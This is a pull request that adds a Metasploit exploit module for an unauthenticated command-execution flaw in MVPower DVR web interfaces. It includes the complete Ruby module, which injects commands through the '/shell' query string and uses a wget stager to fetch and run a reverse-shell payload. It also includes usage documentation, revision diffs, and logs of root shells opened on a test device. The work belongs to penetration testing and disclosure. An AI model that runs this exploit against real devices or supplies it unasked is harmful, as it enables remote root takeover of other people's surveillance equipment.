### PR TITLE
Add MVPower DVR Shell Unauthenticated Command Execution module

### DIFF
--- a/documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md
+++ b/documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md
@@ -1,0 +1,43 @@
+## Vulnerable Application
+
+  This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string.
+
+  This module was tested successfully on a MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17).
+
+  The TV-7108HE model is also reportedly affected, but untested.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/http/mvpower_dvr_shell_exec`
+  3. Do: `set rhost [IP]`
+  4. Do: `set lhost [IP]`
+  5. Do: `run`
+  6. You should get a session
+
+
+## Example Run
+
+
+  ```
+  msf exploit(mvpower_dvr_shell_exec) > run
+
+  [*] Started reverse TCP handler on 10.1.1.197:4444 
+  [*] 10.1.1.191:80 - Connecting to target
+  [+] 10.1.1.191:80 - Target is vulnerable!
+  [*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq
+  [*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq
+  [*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500
+  [*] Command Stager progress - 100.00% done (117/117 bytes)
+  [*] Server stopped.
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 10.1.1.191
+  OS           :  (Linux 3.0.8)
+  Architecture : armv7l
+  Meterpreter  : armle/linux
+  meterpreter > 
+  ```

--- a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb
+++ b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb
@@ -1,0 +1,99 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'MVPower DVR Shell Unauthenticated Command Execution',
+      'Description' => %q{
+        This module exploits an unauthenticated remote command execution
+        vulnerability in MVPower digital video recorders. The 'shell' file
+        on the web interface executes arbitrary operating system commands in
+        the query string.
+
+        This module was tested successfully on a MVPower model TV-7104HE with
+        firmware version 1.8.4 115215B9 (Build 2014/11/17).
+
+        The TV-7108HE model is also reportedly affected, but untested.
+      },
+      'Author'      =>
+        [
+          'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
+          'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'References'  =>
+        [
+          # Comment from Paul Davies contains probably the first published PoC
+          [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
+          # Writeup with PoC by Andrew Tierney from Pen Test Partners
+          [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
+        ],
+      'DisclosureDate' => 'Aug 23 2015',
+      'Privileged'     => true, # BusyBox
+      'Arch'           => ARCH_ARMLE,
+      'DefaultOptions' =>
+        {
+          'Payload' => 'linux/armle/mettle_reverse_tcp'
+        },
+      'Targets'        =>
+        [
+          ['Automatic', {}]
+        ],
+      'DefaultTarget'  => 0))
+    deregister_options('CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    begin
+      fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
+      res = send_request_cgi({
+        'uri' => "/shell?echo+#{fingerprint}",
+        'headers' => { 'Connection' => 'Keep-Alive' }
+      })
+      if res && res.body =~ /#{fingerprint}/
+        return Exploit::CheckCode::Vulnerable
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def execute_command(cmd, opts)
+    begin
+      res = send_request_cgi({
+        'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
+        'headers' => { 'Connection' => 'Keep-Alive' }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Connecting to target")
+
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
+    end
+
+    print_good("#{peer} - Target is vulnerable!")
+
+    execute_cmdstager(flavor: :wget, linemax: 1500)
+  end
+end

--- a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb
+++ b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb
@@ -45,8 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_ARMLE,
       'DefaultOptions' =>
         {
-          'Payload' => 'linux/armle/mettle_reverse_tcp',
-          'cmdstager::flavor' => 'wget'
+          'PAYLOAD' => 'linux/armle/mettle_reverse_tcp',
+          'CMDSTAGER::FLAVOR' => 'wget'
         },
       'Targets'        =>
         [

--- a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb
+++ b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -47,39 +45,39 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_ARMLE,
       'DefaultOptions' =>
         {
-          'Payload' => 'linux/armle/mettle_reverse_tcp'
+          'Payload' => 'linux/armle/mettle_reverse_tcp',
+          'cmdstager::flavor' => 'wget'
         },
       'Targets'        =>
         [
           ['Automatic', {}]
         ],
-      'DefaultTarget'  => 0))
-    deregister_options('CMDSTAGER::FLAVOR')
+      'CmdStagerFlavor' => %w{ echo printf wget },
+      'DefaultTarget'   => 0))
   end
 
   def check
     begin
       fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
-      res = send_request_cgi({
+      res = send_request_cgi(
         'uri' => "/shell?echo+#{fingerprint}",
         'headers' => { 'Connection' => 'Keep-Alive' }
-      })
-      if res && res.body =~ /#{fingerprint}/
-        return Exploit::CheckCode::Vulnerable
+      )
+      if res && res.body.include?(fingerprint)
+        return CheckCode::Vulnerable
       end
     rescue ::Rex::ConnectionError
-      return Exploit::CheckCode::Unknown
+      return CheckCode::Unknown
     end
-    Exploit::CheckCode::Safe
+    CheckCode::Safe
   end
 
   def execute_command(cmd, opts)
     begin
-      res = send_request_cgi({
+      send_request_cgi(
         'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
         'headers' => { 'Connection' => 'Keep-Alive' }
-      })
-      return res
+      )
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
@@ -88,12 +86,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     print_status("#{peer} - Connecting to target")
 
-    unless check == Exploit::CheckCode::Vulnerable
+    unless check == CheckCode::Vulnerable
       fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
     end
 
     print_good("#{peer} - Target is vulnerable!")
 
-    execute_cmdstager(flavor: :wget, linemax: 1500)
+    execute_cmdstager(linemax: 1500)
   end
 end


### PR DESCRIPTION
Add MVPower DVR Shell Unauthenticated Command Execution module

This PR adds a module to exploit an unauthenticated command execution vulnerability in the web interface of MVPower CCTV DVR devices.

@wvu-r7


### Description

This module exploits an unauthenticated remote command execution
vulnerability in MVPower digital video recorders. The 'shell' file
on the web interface executes arbitrary operating system commands in
the query string.

This module was tested successfully on a MVPower model TV-7104HE with
firmware version 1.8.4 115215B9 (Build 2014/11/17).

The TV-7108HE model is also reportedly affected, but untested.


### MSF Tidy

```
$ ./tools/dev/msftidy.rb modules/exploits/linux/http/mvpower_dvr_shell_exec.rb
modules/exploits/linux/http/mvpower_dvr_shell_exec.rb - [INFO] Please use vars_get in send_request_cgi: send_request_cgi({ 'uri' => "/shell?echo+#{fingerprint
modules/exploits/linux/http/mvpower_dvr_shell_exec.rb - [INFO] Please use vars_get in send_request_cgi: send_request_cgi({ 'uri' => "/shell?#{Rex::Text.uri_encode(cmd
```

The entire query string is executed as operating system commands. Using `'vars_get' => {cmd => ''}` feels like unnecessarily working around the library.


### Tests

Working payloads (reliable):
* linux/armle/mettle_reverse_tcp
* linux/armle/shell_reverse_tcp

Not working payloads:
* linux/armle/mettle/bind_tcp  (unreliable)
* linux/armle/mettle/reverse_tcp  (unreliable)
* linux/armle/shell/bind_tcp
* linux/armle/shell/reverse_tcp
* generic/shell_bind_tcp
* generic/shell_reverse_tcp


### Output


```
msf exploit(mvpower_dvr_shell_exec) > check
[+] 10.1.1.191:80 The target is vulnerable.
```

```
msf exploit(mvpower_dvr_shell_exec) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] 10.1.1.191:80 - Connecting to target
[+] 10.1.1.191:80 - Target is vulnerable!
[*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq
[*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq
[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.1.1.191
OS           :  (Linux 3.0.8)
Architecture : armv7l
Meterpreter  : armle/linux
meterpreter > 
```

```
msf exploit(mvpower_dvr_shell_exec) > set payload linux/armle/shell_reverse_tcp 
payload => linux/armle/shell_reverse_tcp
msf exploit(mvpower_dvr_shell_exec) > set shell /bin/sh
shell => /bin/sh
msf exploit(mvpower_dvr_shell_exec) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] 10.1.1.191:80 - Connecting to target
[+] 10.1.1.191:80 - Target is vulnerable!
[*] Using URL: http://0.0.0.0:8080/DXeDKlzsv1
[*] Local IP: http://10.1.1.197:8080/DXeDKlzsv1
[*] Command shell session 2 opened (10.1.1.197:4444 -> 10.1.1.191:56883) at 2017-02-22 00:01:29 -0500
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

id
uid=0(root) gid=0(root)
uname -a
Linux (none) 3.0.8 #26 Tue Jan 21 12:24:20 SGT 2014 armv7l GNU/Linux
```

## Verification

PCAP en-route via email shortly.


